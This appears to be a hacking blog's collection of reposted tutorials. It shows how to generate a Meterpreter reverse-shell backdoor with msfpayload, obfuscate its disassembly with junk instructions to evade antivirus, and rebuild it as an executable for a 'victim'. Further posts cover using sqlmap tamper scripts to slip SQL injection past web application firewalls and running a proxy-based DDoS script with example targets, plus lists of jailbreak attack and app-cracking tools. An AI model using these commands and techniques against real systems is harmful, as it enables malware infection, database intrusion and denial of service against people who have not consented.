Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM)

If you want all the detail, please go to the Source.

1. Create malicious file(backdoor)
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 R > raw_binary
or
$ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 -f raw > raw_binary


2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder of environment ruby folder.
$ cd /pentest/exploit/framework/lib/metasm
$ cp -a metasm.rb metasm /usr/lib/ruby/1.9.2

3. Disassemble it
$ ruby /pentest/exploit/framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm

That will create a file called asm_code.asm which should look something like this

 

entrypoint_0:

cld ; @0 fc

call sub_8fh ; @1 e889000000 x:sub_8fh

pushad ; @6 60

mov ebp, esp ; @7 89e5

xor edx, edx ; @9 31d2

mov edx, fs:[edx+30h] ; @0bh 648b5230 r4:segment_base_fs+30h

mov edx, [edx+0ch] ; @0fh 8b520c r4:unknown

mov edx, [edx+14h] ; @12h 8b5214 r4:unknown

// Xrefs: 8dh

loc_15h:

mov esi, [edx+28h] ; @15h 8b7228 r4:unknown

movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown

xor edi, edi ; @1ch 31ff

// Xrefs: 2ch

loc_1eh:

xor eax, eax ; @1eh 31c0

lodsb ; @20h ac

cmp al, 61h ; @21h 3c61

jl loc_27h ; @23h 7c02 x:loc_27h

sub al, 20h ; @25h 2c20

// Xrefs: 23h

loc_27h:

ror edi, 0dh ; @27h c1cf0d

add edi, eax ; @2ah 01c7

loop loc_1eh ; @2ch e2f0 x:loc_1eh

push edx ; @2eh 52

push edi ; @2fh 57

mov edx, [edx+10h] ; @30h 8b5210 r4:unknown

mov eax, [edx+3ch] ; @33h 8b423c

add eax, edx ; @36h 01d0

mov eax, [eax+78h] ; @38h 8b4078

test eax, eax ; @3bh 85c0

jz loc_89h ; @3dh 744a x:loc_89h

add eax, edx ; @3fh 01d0

push eax ; @41h 50

mov ecx, [eax+18h] ; @42h 8b4818

mov ebx, [eax+20h] ; @45h 8b5820

add ebx, edx ; @48h 01d3

// Xrefs: 66h

loc_4ah:

jecxz loc_88h ; @4ah e33c x:loc_88h

dec ecx ; @4ch 49

mov esi, [ebx+4*ecx] ; @4dh 8b348b

add esi, edx ; @50h 01d6

xor edi, edi ; @52h 31ff

// Xrefs: 5eh

loc_54h:

xor eax, eax ; @54h 31c0

lodsb ; @56h ac

ror edi, 0dh ; @57h c1cf0d

add edi, eax ; @5ah 01c7

cmp al, ah ; @5ch 38e0

jnz loc_54h ; @5eh 75f4 x:loc_54h

add edi, [ebp-8] ; @60h 037df8

cmp edi, [ebp+24h] ; @63h 3b7d24

jnz loc_4ah ; @66h 75e2 x:loc_4ah

pop eax ; @68h 58

mov ebx, [eax+24h] ; @69h 8b5824

add ebx, edx ; @6ch 01d3

mov cx, [ebx+2*ecx] ; @6eh 668b0c4b

mov ebx, [eax+1ch] ; @72h 8b581c

add ebx, edx ; @75h 01d3

mov eax, [ebx+4*ecx] ; @77h 8b048b

add eax, edx ; @7ah 01d0

mov [esp+24h], eax ; @7ch 89442424

pop ebx ; @80h 5b

pop ebx ; @81h 5b

popad ; @82h 61

pop ecx ; @83h 59

pop edx ; @84h 5a

push ecx ; @85h 51

jmp eax ; @86h ffe0

// Xrefs: 4ah

loc_88h:

pop eax ; @88h 58

// Xrefs: 3dh

loc_89h:

pop edi ; @89h 5f

pop edx ; @8ah 5a

mov edx, [edx] ; @8bh 8b12 r4:unknown

jmp loc_15h ; @8dh eb86 x:loc_15h

// Xrefs: 1

sub_8fh:

// function binding: ebp -> dword ptr [esp], esp -> esp-10h

// function ends at 0a0h

pop ebp ; @8fh 5d

push 3233h ; @90h 6833320000

push 5f327377h ; @95h 687773325f

push esp ; @9ah 54

push 726774ch ; @9bh 684c772607

call ebp ; @0a0h ffd5 endsub sub_8fh noreturn

db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h

db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h

db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h

db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h

db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h

db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h

db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h

db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h

db 0ech, 0c3h ; @120h

4. Now obfuscate it. From the Source.
For now, we’ll continue with the “spray and pray” methodology. You can add anything you want so long as you don’t break the functionality of the application. I find that simply pushing registers onto the stack and then popping them back off sometimes will do the trick. Also just before a XOR statement (which is often used to set the value of a register to zero) you can add a bunch of random statements to increment and decrement the register, move values of other registers into it. Anything you do won’t matter because eventually you will be changing the value to zero. So using the above example we can change the section beginning with ‘// Xrefs: 8dh’

From This:

1 2 3 4 5

// Xrefs: 8dh loc_15h: mov esi, [edx+28h] ; @15h 8b7228 r4:unknown movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown xor edi, edi ; @1ch 31ff

To This:

1 2 3 4 5 6 7 8 9 10 11

// Xrefs: 8dh loc_15h: mov esi, [edx+28h]                ; @15h 8b7228 r4:unknown movzx ecx, word ptr [edx+26h]        ; @18h 0fb74a26 r2:unknown mov edi, ecx                ; Move the contents of the ECX register into the EDI Register push edi                    ; Push the EDI register onto the current stack frame pop edi                    ; Pop it back off mov edi, ecx                ; Mov ECX back into edi xor ecx, ecx                ; Zero out the contents of the ECX register mov ecx, edi                ; Mov EDI back into ECX xor edi, edi                ; @1ch 31ff

5. Add the following two lines to the top of the file for it to build correctly

.section '.text' rwx

.entrypoint

6. Use metasm to build the executionable and package it into the format that windows can run.
$ /pentest/exploits/framework/lib/metasm/samples/peencode.rb asm_code.asm -o coolstuff.exe

7. Now check the file with
$ file coolstuff.exe

8. Run it in the victim with your social engineering skill. Have a nice hack :).

Source: http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Recommended Security Application For iOS

All the app that I recommended, you must jailbreak your device. 

Repository:
Default cydia repo
http://cydia.myrepospace.com/chattaboxa
http://cydia.myrepospace.com/boo
http://cydia.theworm.tw/

• OpenSSH – Allows to connect to the iPhone remotely over SSH
• Adv-cmds : Comes with a set of process commands like ps, kill, finger…
• Sqlite3 : Sqlite database client
• GNU Debugger: For run time analysis & reverse engineering
• Syslogd : To view iPhone logs
• Veency: Allows to view the phone on the workstation with the help of veency client
• Tcpdump: To capture network traffic on phone
• com.ericasadun.utlities: plutil to view property list files
• Grep: For searching
• Odcctools: otool – object file displaying tool
• Crackulous: Decrypt iPhone apps
• Hackulous: To install decrypted apps
• Protect my privacy - protect personal information on your iPhone.
• Metasploit
• SET (Social Engineering Tool)
• Nikto2 (depends on Perl(which takes a lot of space on root partition))
• Stealth Mac
• Inguma
• Slow loris
• Pentbox 1.4
• Netcat
• iPwn
• Ettercap-ng
• dsniff
• danaus plexippus
• iAHT
• Nmap

Source: https://securitylearn.wordpress.com/2012/02/07/useful-cydia-apps-for-pentesting/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Bypassing Web Application Firewalls with SQLMap Tamper Scripts

The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/

The first scripts I’ll demonstrate are space2hash.py and space2morehash.py which work with MySQL (still haven't gotten around to the MSSQL one). These scripts will convert all spaces to block comments with random text. The extended version of the script (space2morehash.py) will also add the comments in between certain function names and the parenthesis.

To get started using the tamper scripts, you use the --tamper switch followed by the script name. In my example I'm using the following command:

./sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

Figure 1: space2morehash.py tamper script in action

As shown in figure 1, the tamper script replaces the spaces in the injection with %23randomText%0A, which is of course URL encoded. The function's CHAR(), USER(), CONCAT() get changed to FUNCTION%23randomText%0A() since they aren't blacklisted in IGNORE_SPACE_AFFECTED_KEYWORDS. This is because of MySQL's Function Name Parsing and Resolution and how it treats function calls and identifiers.

Another two scripts that transform spaces are space2mssqlblank.py and space2mysqlblank.py. MySQL allows characters 09, 0A-0D, A0 to be used as whitespaces while MSSQL allows a much wider range, from 01-1F.

Figure 2: space2mssqlblank.py using different characters as whitespaces

Next up we have a few scripts that mess around with the encoding: charencode.py and chardoubleencode.py. These are useful to bypass different keyword filters, for example when table_name is being detected and there is no way around it.

Figure 3: charencode.py can be used to evade keyword detection

If the application URL decodes the request for some reason (some do), the chardoubleencode.py script can come in handy.

Figure 4: chardoubleencode.py can be used when the application decodes the request

Additionally, if the application is programmed in ASP/ASP.NET, the charunicodeencode.py and percentage.py scripts can be used to hide the true payload.

Figure 5: charunicodeencode.py obfuscating the injection with Unicode encoding

An interesting characteristic of ASP is the ability to add as many percentage signs as you want in between characters. For example, AND 1=%%%%%%%%1 is completely valid!

Figure 6: Percent signs in between each character is valid in ASP

Source: http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Barrelroll - Make Proxy Server to DDoS Clients

This program makes proxy servers into DDoS clients. Use only for educational and research purposes. 

->Requires<-

-> pycurl

-> python 2.3

                                     ->Usage<-

$ ./barrelroll.py [ip] [host] [forks]

                                    ->Example<-

$ ./barrelroll.py 8.8.8.8 google.com 30 < full_list/_full_list.txt

$ ./barrelroll.py 8.8.4.4 google.com 30 < full_list/us.txt

 

Source: https://github.com/lfamorim/barrelroll

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Adding More Pentesting Tools for BackTrack 5

If you want the detail and list of tools, please go to the source.

1. Download the script
- svn checkout http://bt5-fixit.googlecode.com/svn/trunk/ bt5-fixit
2. Go into folder and change mode of script
- cd bt5-fixit
- chmod +x bt5-fixit.sh
3. Run it and check what you got.
- ./bt5-fixit.sh

Source: http://www.theprojectxblog.net/improving-and-adding-more-pentesting-tools-for-backtrack-5/

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00